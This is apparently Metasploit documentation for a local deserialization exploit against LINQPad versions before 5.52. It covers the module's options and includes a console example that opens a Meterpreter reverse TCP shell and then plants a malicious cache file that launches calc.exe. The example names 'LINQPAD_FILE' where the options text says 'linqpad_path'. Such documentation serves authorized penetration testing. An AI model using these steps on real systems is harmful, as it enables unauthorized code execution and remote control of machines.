adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c23c848d2eeffa5a01dfdcdafa63340002b06eb9
metasploit-gs/documentation/modules/exploit/windows/local/linqpad_deserialization.md
T
msutovsky-r7 3af76cfa00 Renames incorrect option in documentation 
Co-authored-by: Brendan <bwatters@rapid7.com>
2025-05-13 06:30:00 +02:00

56 lines
2.5 KiB
Markdown
Raw Blame History

## LINQPad 5.48 Deserialization
LINQPad is a scratchpad for .NET programming. Versions prior to 5.52 contain a deserialization vulnerability in processing cache file when program is starting. Application can be downloaded from [here](https://www.linqpad.net/).
## Verification Steps
Steps:
1. Install the application
2. Start msfconsole
3. Get Meterpreter/cmd shell
4. Run: `use windows/local/linqpad_deserialization`
5. Set payload - for example `set payload cmd/windows/generic` - and corresponding parameters
5. Set parameters `session`, `cache_path`, `linqpad_path`, `cleanup`
6. Run exploit
## Options
### cleanup
Enable cleanup of malicious file. The module will replace cache filewith malicious content. If `cleanup` is enabled, after successful execution, the module will remove malicious cache file. The original file will be restored upon re-execution of Linqpad.
### cache\_path
The parameter sets path for folder, where vulnerable cache file is present. This is crucial part of the exploit as the folder can be used to identify whether the current version is vulnerable and the payload delivery is performed through cache file.
### linqpad\_path
Final part of exploit runs the LINQPad to trigger deserialization procedure. The `linpad_path` parameter sets the path to LINQPad binary, which is ran at the end of exploit.
Example:
```
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST 192.168.95.128
msf6 exploit(multi/handler) > set LPORT 4242
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.95.128:4242
[*] Meterpreter session 1 opened (192.168.95.128:4242 -> 192.168.95.130:53430) at 2024-12-30 12:46:16 +0100
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use windows/local/linqpad_deserialization
msf6 exploit(windows/local/linqpad_deserialization) > set LINQPAD_FILE C:/ProgramData/LINQPad/Updates50.AnyCPU/552/LINQPad.exe
msf6 exploit(windows/local/linqpad_deserialization) > set payload windows/exec/cmd
msf6 exploit(windows/local/linqpad_deserialization) > set cache_path C:/Users/ms/AppData/Local/LINQPad
msf6 exploit(windows/local/linqpad_deserialization) > set CMD calc.exe
msf6 exploit(windows/local/linqpad_deserialization) > set session 1
msf6 exploit(windows/local/linqpad_deserialization) > exploit
[*] Exploit completed, but no session was created.
```
Previous example will run `calc.exe` when LINQPad will start.
Reference in New Issue View Git Blame Copy Permalink